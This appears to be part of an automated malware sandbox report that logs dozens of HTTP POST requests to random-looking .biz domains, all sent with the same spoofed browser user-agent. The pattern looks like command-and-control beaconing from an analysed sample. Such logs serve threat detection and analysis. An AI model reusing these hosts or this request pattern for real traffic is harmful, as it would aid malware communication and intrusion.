                    Source: global trafficHTTP traffic detected: POST /fflfjsnvrvmguebc HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: brsua.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                    Source: global trafficHTTP traffic detected: POST /sv HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: gytujflc.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 842
                    Source: global trafficHTTP traffic detected: POST /nvkbktvsplwlkgem HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: qaynky.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 842
                    Source: global trafficHTTP traffic detected: POST /e HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: dlynankz.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                    Source: global trafficHTTP traffic detected: POST /smwfchek HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: bumxkqgxu.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 842
                    Source: global trafficHTTP traffic detected: POST /sywxrbcrkxovprj HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: dlynankz.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                    Source: global trafficHTTP traffic detected: POST /pgswneolngwqmbma HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: dwrqljrr.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 842
                    Source: global trafficHTTP traffic detected: POST /b HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: oflybfv.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                    Source: global trafficHTTP traffic detected: POST /ufwhu HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: nqwjmb.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 842
                    Source: global trafficHTTP traffic detected: POST /dinrksxkdm HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: yhqqc.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                    Source: global trafficHTTP traffic detected: POST /pntkcm HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ytctnunms.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 842
                    Source: global trafficHTTP traffic detected: POST /ovpu HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: mnjmhp.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                    Source: global trafficHTTP traffic detected: POST /cqtkpvwafc HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: myups.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 842
                    Source: global trafficHTTP traffic detected: POST /n HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: myups.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 842
                    Source: global trafficHTTP traffic detected: POST /cuqmfcku HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: oshhkdluh.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 842
                    Source: global trafficHTTP traffic detected: POST /ngmt HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: opowhhece.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                    Source: global trafficHTTP traffic detected: POST /hunwmwyhqkxby HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: yunalwv.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 842
                    Source: global trafficHTTP traffic detected: POST /ehsrasnoy HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: yunalwv.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 842
                    Source: global trafficHTTP traffic detected: POST /mmajvqk HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: jpskm.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 842
                    Source: global trafficHTTP traffic detected: POST /vudapeuv HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: jdhhbs.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                    Source: global trafficHTTP traffic detected: POST /qirifxoxiwrelcr HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: lrxdmhrr.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 842
                    Source: global trafficHTTP traffic detected: POST /vhuy HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: wllvnzb.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 842
                    Source: global trafficHTTP traffic detected: POST /vjfojjg HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: mgmsclkyu.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                    Source: global trafficHTTP traffic detected: POST /xu HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: mgmsclkyu.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                    Source: global trafficHTTP traffic detected: POST /pb HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: gnqgo.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 842
                    Source: global trafficHTTP traffic detected: POST /bbdsvdesg HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: jhvzpcfg.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 842
                    Source: global trafficHTTP traffic detected: POST /fvijpyejxccmhfmi HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: warkcdu.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                    Source: global trafficHTTP traffic detected: POST /p HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: acwjcqqv.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 842
                    Source: global trafficHTTP traffic detected: POST /tcj HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: vyome.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 842
                    Source: global trafficHTTP traffic detected: POST /qwnv HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: gcedd.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                    Source: global trafficHTTP traffic detected: POST /npkowol HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: yauexmxk.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 842
                    Source: global trafficHTTP traffic detected: POST /kjhhbldlylrmqyc HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: iuzpxe.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 842
                    Source: global trafficHTTP traffic detected: POST /vv HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: jwkoeoqns.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                    Source: global trafficHTTP traffic detected: POST /wufabwul HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: xccjj.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                    Source: global trafficHTTP traffic detected: POST /n HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: sxmiywsfv.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 842
                    Source: global trafficHTTP traffic detected: POST /bjmq HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: hehckyov.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                    Source: global trafficHTTP traffic detected: POST /fcyfmvndcv HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: vrrazpdh.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 842
                    Source: global trafficHTTP traffic detected: POST /qtsndkyu HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: rynmcq.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                    Source: global trafficHTTP traffic detected: POST /pnuofhgyvs HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ftxlah.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 842
                    Source: global trafficHTTP traffic detected: POST /pwpf HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: uaafd.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                    Source: global trafficHTTP traffic detected: POST /hcvbujevnkcp HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: typgfhb.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 842
                    Source: global trafficHTTP traffic detected: POST /sksexgcippwxc HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: esuzf.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 842
                    Source: global trafficHTTP traffic detected: POST /esxyeqyttv HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: eufxebus.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                    Source: global trafficHTTP traffic detected: POST /rq HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: gvijgjwkh.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 842
                    Source: global trafficHTTP traffic detected: POST /vjmsosrx HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: qpnczch.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 842
                    Source: global trafficHTTP traffic detected: POST /poiwrabuiumompma HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: pwlqfu.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                    Source: global trafficHTTP traffic detected: POST /vtpac HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: brsua.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 842
                    Source: global trafficHTTP traffic detected: POST /sv HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: rrqafepng.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                    Source: global trafficHTTP traffic detected: POST /oq HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: dlynankz.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 842
                    Source: global trafficHTTP traffic detected: POST /nurhntuqrhttbayt HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: dlynankz.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 842
                    Source: global trafficHTTP traffic detected: POST /qxbbm HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: oflybfv.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 842
                    Source: global trafficHTTP traffic detected: POST /vhxrnsynbee HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ctdtgwag.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                    Source: global trafficHTTP traffic detected: POST /tgkqrcfn HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: yhqqc.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 842
                    Source: global trafficHTTP traffic detected: POST /gajxy HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: tnevuluw.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                    Source: global trafficHTTP traffic detected: POST /xcjwbjksxdykmrix HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: mnjmhp.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 842
                    Source: global trafficHTTP traffic detected: POST /jarjdamitgg HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: whjovd.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                    Source: global trafficHTTP traffic detected: POST /ndn HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: opowhhece.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 842
                    Source: global trafficHTTP traffic detected: POST /qdigkbbwou HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: jdhhbs.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 842
                    Source: global trafficHTTP traffic detected: POST /jvsdbpglagvynifq HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: gjogvvpsf.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                    Source: global trafficHTTP traffic detected: POST /yeixpxtqdbgl HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: gjogvvpsf.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                    Source: global trafficHTTP traffic detected: POST /pnw HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: mgmsclkyu.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 842
                    Source: global trafficHTTP traffic detected: POST /xprpgfukortnennm HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: reczwga.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                    Source: global trafficHTTP traffic detected: POST /ikjsulgnyvsnqbkp HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: warkcdu.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 842
                    Source: global trafficHTTP traffic detected: POST /w HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: bghjpy.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                    Source: global trafficHTTP traffic detected: POST /aa HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: gcedd.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 842
                    Source: global trafficHTTP traffic detected: POST /kxlr HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: damcprvgv.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
